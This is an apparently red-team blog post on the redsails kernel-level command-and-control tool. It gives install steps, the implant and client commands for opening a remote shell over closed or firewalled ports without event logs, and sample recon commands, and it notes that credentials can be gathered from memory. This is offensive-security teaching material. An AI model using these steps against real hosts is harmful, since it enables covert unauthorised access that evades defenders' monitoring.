Command and Control – Kernel

Modern environments implement different level of security controls like endpoint solutions, host intrusion prevention systems, firewalls and real-time event log analysis. From the other hand red team engagements are trying to evade these controls in order to avoid being detected. However the majority of the tools will create some sort of noise on the network level or on the host level by producing various event logs.

R.J. Mcdown and Joshua Theimer have released a tool called redsails during DerbyCon 2017 which its purpose is to allow the red teamer to execute commands on the target host without creating any event logs or establishing a new connection. This tool is written in python and it uses an open source network driver (WinDivert) that interacts with the windows kernel in order to manipulate TCP traffic towards another host. The implant can use ports that are blocked by the windows firewall or not open in order to communicate back with the command and control server. It should be noted that the implant needs to be executed with administrator level privileges.

Redsails has the following dependencies:

pip install pydivert
pip install pbkdf2
easy_install pycrypto

The Microsoft Visual C++ compiler is also needed prior to the installation of pycrypto.

The implant needs to be executed on the target with the following parameters:

redsails.exe -a <IP Address> -p <password> -o <port>

The same port and password needs to be used and on the command and control server in order to establish a shell.

python redsailsClient.py -t <IP Address> -p <password> -o <port>

redsails – Client Parameters

No new connections will established and the port will remain in listening mode even though there is a direct connection.

redsails – No Active Connections

Even if a port is not open on the host it is still possible to use it for command execution without creating any new connections.

redsails – Port 22 is not Active

redsails – Shell via Closed Port

Commands can be executed from the redsails console on the target.

SHELL::net users
SHELL::whoami
SHELL::ipconfig

redsails – Executing Shell Commands

Redsails has also PowerShell support therefore it can execute PowerShell commands.

redsails – PowerShell

Additional PowerShell scripts can be used in order to perform further recon on the target or gather credentials from memory.